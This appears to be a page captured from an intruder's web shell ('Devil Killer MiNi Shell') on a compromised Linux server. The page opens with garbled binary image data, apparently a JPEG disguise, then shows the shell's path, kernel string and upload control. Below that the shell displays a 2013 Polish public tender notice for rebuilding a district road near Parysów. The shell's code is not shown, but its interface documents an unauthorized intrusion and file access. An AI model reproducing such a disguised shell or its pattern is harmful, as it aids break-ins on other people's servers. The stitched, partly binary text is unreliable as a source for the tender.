JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130627/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130627/126709-N-2013.html

<p class="kh_header"><b>Wola Rębkowska: Przebudowa drogi powiatowej Nr 2246W Stara Wieś - Wólka Dłużewska - Parysów
 (ul. Garwolińska i Rynek w Parysowie) w km 13+517 - 13+760</b><br>
<b>Numer ogłoszenia: 126709 - 2013; data zamieszczenia: 27.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Zarząd Dróg w Garwolinie , ul. Przemysłowa 45, 08-410 Wola Rębkowska, woj. mazowieckie, tel. 025 6822215.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pzdgarwolin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa drogi powiatowej Nr 2246W Stara Wieś - Wólka Dłużewska - Parysów
 (ul. Garwolińska i Rynek w Parysowie) w km 13+517 - 13+760.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje wykonanie przebudowy drogi powiatowej Nr 2246W Stara Wieś - Wólka Dłużewska - Parysów  (ul. Garwolińska i Rynek w Parysowie)  w km 13+517 ÷ 13+760.
Przebudowa obejmuje:
ROBOTY  PRZYGOTOWAWCZE
Roboty pomiarowe przy liniowych robotach ziemnych - trasa dróg w terenie równinnym w ilości 0,243 km
Specjalistyczna archeologiczna dokumentacja konserwatorska w ilości 1 szt.
Mechaniczne ścinanie drzew z karczowaniem pni o średnicy 10-15 cm w ilości 6 szt.
Mechaniczne ścinanie drzew z karczowaniem pni o średnicy 16-25 cm w ilości 6 szt.
Mechaniczne ścinanie drzew z karczowaniem pni o średnicy 26-35 cm w ilości 2 szt.
Karczowanie pni o śr. 16-25 cm koparką podsiębierną w gruntach kat. I-II o normalnej wilgotności w ilości 3 szt.
Wywożenie dłużyc na odległość do 2 km w ilości 2,1 mp
Wywożenie karpiny na odległość do 2 km w ilości 1,27 mp
Wywożenie gałęzi na odległość do 2 km w ilości 2,84 mp
Zabezpieczenie drzew o średnicy do 30 cm na okres wykonywania robót ziemnych w ilości szt. 6
Zabezpieczenie drzew o średnicy ponad 30 cm na okres wykonywania robót ziemnych w ilości 5 szt.
Roboty ziemne wykonywane koparkami przedsiębiernymi o poj. łyżki 0.60 m3 w gr. kat. I-III w ziemi uprzednio zmagazynowanej w hałdach z transportem urobku na odległość do 1 km samochodami samowyładowczymi	w ilości 3,9 m3
Dodatek za każdy rozpoczęty 1 km transportu ziemi samochodami samowyładowczymi po drogach o nawierzchni utwardzonej(kat.gr. I-IV), krotność = 4 w ilości 3,9 m3
Rozebranie w-wy gruzu gr. 15 cm mechanicznie w ilości 24,8 m2
Rozebranie podbudowy z gruntu stabilizowanego gr. 10 cm mechanicznie w ilości 580 m2
Rozebranie podbudowy z gruntu stabilizowanego gr. 10*1,5=15 cm mechanicznie - na zjazdach, krotność=1,5 w ilości 113,3m2
Rozebranie nawierzchni z brukowca gr.10 cm mechanicznie, krotność = 0,5 w ilości 1437 m2
Rozebranie nawierzchni z mas mineralno-bitumicznych gr. 4*0,75=3 cm mechanicznie
Krotność=0,75 w ilości 1531m2
Rozebranie nawierzchni z płyt drogowych betonowych gr. 15 cm o spoinach wypełnionych piaskiem w ilości 10,2 m2
Rozebranie nawierzchni z płyt drogowych betonowych gr. 12 cm o spoinach wypełnionych piaskiem w ilości 15 m2
Ręczne rozebranie nawierzchni z kostki betonowej gr. 6cm na podsypce piaskowej w ilości 580 m2
Ręczne rozebranie nawierzchni z kostki betonowej gr. 8 cm na podsypce piaskowej w ilości 113,3 m2
Rozebranie obrzeży trawnikowych o wymiarach 6x20 cm na podsypce piaskowej w ilości 240 m
Rozebranie krawężników betonowych na podsypce cementowo-piaskowej w ilości 428	m
Wywiezienie gruzu z terenu rozbiórki przy mechanicznym załadowaniu i wyładowaniu samochodem samowyładowczym na odległość 1 km w ilości 335,06 m3
Wywiezienie gruzu z terenu rozbiórki przy mechanicznym załadowaniu i wyładowaniu samochodem samowyładowczym - dodatek za każdy następny rozpoczęty 1 km
Krotność=14	w ilości 335,06 m3	
Rozebranie słupków do znaków i konstrukcji wsporczych w ilości 10 szt.	
Pionowe znaki drogowe - zdjęcie znaków lub drogowskazów w ilości 12 szt.
Transport złomu samochodem skrzyniowym z załadunkiem i wyładunkiem mechanicznym na odległość do 1 km w ilości 0,124 t
Transport złomu samochodem skrzyniowym - dodatek za każdy rozpoczęty km ponad 1 km, krotność = 14 w ilości 0,124 t
Regulacja pionowa studzienek dla kratek ściekowych ulicznych w ilości 4 szt.
Regulacja pionowa studzienek dla włazów kanałowych w ilości 11 szt.
Regulacja pionowa studzienek dla zaworów wodociągowych i gazowych w ilości 6 szt.
Regulacja pionowa studzienek telefonicznych w ilości 6 szt.

ROBOTY ZIEMNE
Roboty ziemne wykonywane koparkami przedsiębiernymi o poj. łyżki 0.60 m3 w gr. kat. III-IV z transportem 

urobku na odległość do 1 km samochodami samowyładowczymi w ilości 394 m3	
Dodatek za każdy rozpoczęty 1 km transportu ziemi samochodami samowyładowczymi po drogach o nawierzchni utwardzonej(kat.gr. I-IV)
Krotność=4 w ilości 394 m3	
Roboty ziemne wykonywane koparkami przedsiębiernymi o poj. łyżki 0.60 m3 w gr. kat. III-IV z transportem urobku na odległość do 1 km samochodami samowyładowczymi w ilości 15 m3
Dodatek za każdy rozpoczęty 1 km transportu ziemi samochodami samowyładowczymi po drogach o nawierzchni utwardzonej(kat.gr. I-IV)
Krotność=4 w ilości 15 m3	
Formowanie i zagęszczanie nasypów o wys. do 3,0 m spycharkami w gruncie kat. III w ilości 15 m3
Zagęszczanie nasypów walcami samojezdnymi statycznymi ogumionymi; grunt sypki kat. I-II w ilości 15 m3
Plantowanie (obrobienie na czysto) skarp i korony nasypów w gruntach kat. I-III w ilości 102 m2
PODBUDOWY
Profilowanie i zagęszczanie podłoża wykonywane ręcznie w gruncie kat. II-IV pod warstwy konstrukcyjne nawierzchni w ilości 2386,5 m2
Oczyszczenie mechaniczne nawierzchni drogowych nieulepszonych w ilości 4169,9 m2
Oczyszczenie mechaniczne nawierzchni drogowych bitumicznych	 w ilości 1892,5 m2
Skropienie asfaltem nawierzchni drogowych w ilości 3303,8 m2
Warstwa górna podbudowy z kruszyw łamanych gr. 10 cm- projektowana droga
Krotność=2 w ilości 1411,3 m2
Warstwa górna podbudowy z kruszyw łamanych gr. w-wy po zagęszczeniu 10 cm - na chodnikach w ilości 702 m2
Warstwa górna podbudowy z kruszyw łamanych gr. w-wy po zagęszczeniu 15 cm - na zjazdach w ilości 174,2 m2
Podbudowy z gruntu stabilizowanego cementem w ilości 20 kg/m2, gr. w-wy po zagęszczeniu 10 cm - projektowana droga, krotność=1,5 w ilości 1411,3 m2
Podbudowy z gruntu stabilizowanego cementem w ilości 20 kg/m2, gr. w-wy po zagęszczeniu 10 cm - na zjazdach w ilości 174,2 m2
Podbudowy z gruntu stabilizowanego cementem w ilości 25 kg/m2, warstwa gr. w-wy po zagęszczeniu 15 cm - zatoka autobusowa w ilości 99 m2	
Podbudowy z gruntu stabilizowanego cementem w ilości 20 kg/m2, warstwa gr. w-wy po zagęszczeniu 10 cm - zatoka autobusowa, krotność=1,2 w ilości 99 m2
Podbudowy z chudego betonu, grubość warstwy 20 cm - na zatokach autobusowych w ilości 99 m2
NAWIERZCHNIE
Nawierzchnie z mieszanek mineralno-bitumicznych asfaltowych o grubości 4*1,25=5 cm (warstwa ścieralna), krotność=1,25	w ilości 1832,2 m2
Dodatek za transport mieszanki mineralno-bitumicznej - 1 km ponad 5 km, krotność = 20 w ilości 229,03 t
Nawierzchnie z mieszanek mineralno-bitumicznych asfaltowych o grubości 5 cm (warstwa wiążąca), krotność=1,4 w ilości 1411,3 m2
Dodatek za transport mieszanki mineralno-bitumicznej - 1 km ponad 5 km
Krotność=20	w ilości 246,98 m3
Roboty remontowe - frezowanie nawierzchni bitumicznej o gr. do 4 cm z wywozem materiału z rozbiórki na odl. do 1 km w ilości 237,5 m2
Wywiezienie gruzu z terenu rozbiórki przy mechanicznym załadowaniu i wyładowaniu samochodem samowyładowczym na odległość 1 km w ilości 237,5 m3
Wywiezienie gruzu z terenu rozbiórki przy mechanicznym załadowaniu i wyładowaniu samochodem samowyładowczym - dodatek za każdy następny rozpoczęty 1 km
Krotność=14 w ilości 237,5 m3
Regeneracja nawierzchni bitumicznych przy użyciu geosiatki -naprawa nawierzchni bitumicznej w ilości 350 m2
Nawierzchnie z kostki brukowej betonowej grubość 8 cm na podsypce cementowo-piaskowej w ilości 273,2 m2
ROBOTY WYKOŃCZENIOWE
Humusowanie skarp z obsianiem przy grubości warstwy humusu 5 cm w ilości 102 m2
URZĄDZENIA BEZPIECZEŃSTWA RUCHU
Oznakowanie poziome jezdni farbą chlorokauczukową - linie segregacyjne i krawędziowe ciągłe malowane mechanicznie w ilości 21,8 m2
Oznakowanie poziome jezdni farbą chlorokauczukową - linie segregacyjne i krawędziowe przerywane malowane mechanicznie w ilości 15,2 m2
Oznakowanie poziome jezdni farbą chlorokauczukową - linie na skrzyżowaniach i przejściach dla pieszych malowane mechanicznie w ilości 48,6 m2
Oznakowanie poziome jezdni farbą chlorokauczukową - strzałki i inne symbole malowane ręcznie w ilości 0,8 m2
Pionowe znaki drogowe - słupki z rur stalowych w ilości 16 szt.
Pionowe znaki drogowe - drogowskazy jednoramienne o pow. ponad 0.3 m2 w ilości 23 szt.
Pionowe znaki drogowe - drogowskazy jednoramienne o pow. ponad 0.3 m2 - tablice
Krotność=2 w ilości 2 szt.
ELEMENTY ULIC
Krawężniki betonowe wystające o wymiarach 15x30 cm z wykonaniem ław betonowych na podsypce cementowo-piaskowej w ilości 543,5 m
Chodniki z kostki brukowej betonowej grubości 6 cm na podsypce cementowo-piaskowej z wypełnieniem spoin piaskiem w ilości 702 m2
Obrzeża betonowe o wymiarach 20x6 cm na podsypce piaskowej, spoiny wypełnione zaprawą cementową w ilości 212 m
BUDOWA KANAŁU TECHNOLOGICZNEGO
Budowa studni kablowych prefabrykowanych rozdzielczych SK, typ SK-1g pogłębiona, grunt kategorii III w ilości 4 szt.
Budowa studni kablowych prefabrykowanych rozdzielczych SK, typ SK-1, grunt kategorii III w ilości 7 szt.
Montaż elementów mechanicznej ochrony przed ingerencją osób nieuprawnionych w istniejących studniach kablowych, pokrywa dodatkowa typ ZPIRL1cm w ilości 11 szt.
Analogia - Montaż zamka Abloy w studni kablowej SK-1	w ilości 11 szt.
Budowa kanalizacji kablowej pierwotnej z rur z tworzyw sztucznych HDPE 110/6,3 w wykopie wykonanym mechanicznie w gruncie kategorii III, 1 warstwa i 1 otwór w ciągu kanalizacji, 1 rura w warstwie w ilości 221,5 m
Wykonanie przepustów pod drogami i innymi przeszkodami, przeciskiem hydr., z powrotnym wciąganiem rur (kategoria gruntu III-IV), dł. do 10 m, rura HDPE 110/6,3mm, nakłady częściowe liczone na 1 m w ilości 20 m
Wykonanie przepustów pod drogami i innymi przeszkodami, przeciskiem hydraulicznym z powrotnym wciąganiem rur (kat. gr. III-IV), dodatek za każdy 1 m dł. ponad 10 m, rura HDPE 110 mm w ilości 3 m
Wykonanie przepustów pod drogami i innymi przeszkodami, przeciskiem hydraulicznym z powrotnym wciąganiem rur (kat. gr. III-IV), dł. do 10 m, rura HDPE 110/6,3 mm, nakłady częściowe liczone na 1 przepust w ilości 2 szt.
Wprowadzenie kanalizacji kablowej z rur HDPE 110/6,3 do studni kablowej, podłoże: beton, 1 otwór wprowadzony do studni - analogia w ilości 2 szt..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.30.00-9, 45.11.10.00-8, 45.11.20.00-5, 45.23.10.00-5, 45.23.20.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości 8 136,28PLN PLN (słownie; osiem tysięcy sto trzydzieści sześć złotych 28/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku wiedzy i doświadczenia Zamawiający uzna wykaz robót budowlanych, wykonanych w okresie ostatnich 5-ciu lat tj. 2008/2009/2010/2011,2012r. przed upływem terminu składania ofert, (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie), co najmniej 2 robót drogowych (tj. robót przygotowawczych, robót ziemnych, podbudowy, nawierzchni, robót wykończeniowych, urządzeń bezpieczeństwa ruchu, elementów ulic o wartości nie mniejszej niż 500 000,00zł brutto każda) wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania (załącznik Nr 5) oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku dysponowania odpowiednim  potencjałem technicznym  do realizacji zamówienia, Zamawiający uzna, że Wykonawca  posiada lub będzie dysponował jednostkami sprzętu wraz z informacją o podstawie dysponowania tymi zasobami. przewidzianego do wykonania zamówienia - na załączonym formularzu - załącznik Nr 4 - zgodnie z wyszczególnieniem w punkcie 5.3. Instrukcji dla Wykonawców; * Wytwórnia mas bitumicznych  o mieszaniu cyklicznym lub ciągłym do wytwarzania mieszanek  mineralno-asfaltowych - szt. 1(dopuszcza się zakup mieszanki mineralno-asfaltowej, w tym przypadku należy podać źródło zakupu, Piła motorowa łańcuchowa 4.2 KM - szt. 1, Koparka 0,60 m3 - szt. 1, Samochody samowyładowcze 5 t -15t - w ilości zapewniającej ciągłość robót, Zrywarka przyczepna - szt. 1, Sprężarka powietrzna spalinowa 4-5 m3/min - szt. 1, Równiarka samojezdna 74 kW (100 KM) - szt. 1,  Żuraw do 5 t - szt. 1, Walec statyczny samojezdny ogumiony 10 t - szt. 1, Walec statyczny samojezdny - szt. 1, Walec statyczny samojezdny ogumiony - szt. 1, Mieszarka do stabilizacji gruntu doczepna (bez ciągnika) szerokości 1,9-2,3 m - szt. 1, Gruntofrezarka (bez ciągnika) kpl. - szt. 1, Walec wibracyjny samojezdny - szt. 1, Rozkładarka mas bitumicznych o szer. 4.0 m - szt. 1,  Frezarka do nawierzchni drogowych bez podajnika 0,5 m - szt. 1, Szczotka mechaniczna samojezdna - szt. 1, Skrapiarka do bitumu samojezdna samochodowa 3 m3 - szt. 1, Ciągnik kołowy 29-37 kW (40-50 KM) - szt. 1, Walec stalowy wibracyjny samojezdny 8 t - szt. 1, Wibrator powierzchniowy - szt. 1, Piła do cięcia kostki - szt. 1, Malowarka do znakowania dróg - szt. 1,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku dysponowania osobami zdolnymi do wykonywania zamówienia, Zamawiający uzna dysponowanie osobami - Kierownik robót posiadającymi uprawnienia budowlane do kierowania robotami drogowymi (minimum jedna osoba), laborant (minimum jedna osoba), majster robót bitumicznych   (minimum jedna osoba), operator skrapiarki, (minimum jedna osoba) Operator piły motorowej łańcuchowej 4.2 KM (minimum jedna osoba),Operator koparki 0,60 m3 (minimum jedna osoba), Operator zrywarki przyczepnej (minimum jedna osoba), Operator sprężarki powietrznej spalinowej 4-5 m3/min (minimum jedna osoba), Operator równiarki samojezdnej 74 kW (100 KM) (minimum jedna osoba), Operator żurawia do 5 t (minimum jedna osoba),Operator walca statycznego samojezdnego ogumionego 10 t (minimum jedna osoba), Operator walca statycznego samojezdnego (minimum jedna osoba), Operator walca statycznego samojezdnego ogumionego (minimum jedna osoba), Operator mieszarki do stabilizacji gruntu doczepnej (bez ciągnika) szerokości 1,9-2,3 m (minimum jedna osoba), Operator gruntofrezarki (bez ciągnika) kpl. (minimum jedna osoba), Operator walca wibracyjnego samojezdnego (minimum jedna osoba), Operator rozkładarki mas bitumicznych o szer. 4.0 m (minimum jedna osoba), Operator frezarki do nawierzchni drogowych bez podajnika 0,5 m (minimum jedna osoba), Operator szczotki mechanicznej samojezdnej (minimum jedna osoba), Operator skrapiarki do bitumu samojezdnej samochodowej 3 m3 (minimum jedna osoba), Operator ciągnika kołowego 29-37 kW (40-50 KM) (minimum jedna osoba), Operator walca stalowego wibracyjnego samojezdnego 8 t  (minimum jedna osoba), Operator wibratora powierzchniowego (minimum jedna osoba), Operator piły do cięcia kostki (minimum jedna osoba),Operator malowarki do znakowania dróg - wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi  osobami. na załączonym formularzu - załącznik Nr 3, wraz z oświadczeniem, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku dotyczącego sytuacji ekonomicznej i finansowej, Zamawiający uzna 
1. Oświadczenie, że Wykonawca dysponuje środkami finansowymi w kwocie 550 000,00zł  niezbędnymi do wykonania zamówienia na załączniku Nr 2
2. posiadanie  opłaconej polisy  opiewającej na kwotę 50 000,00  lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

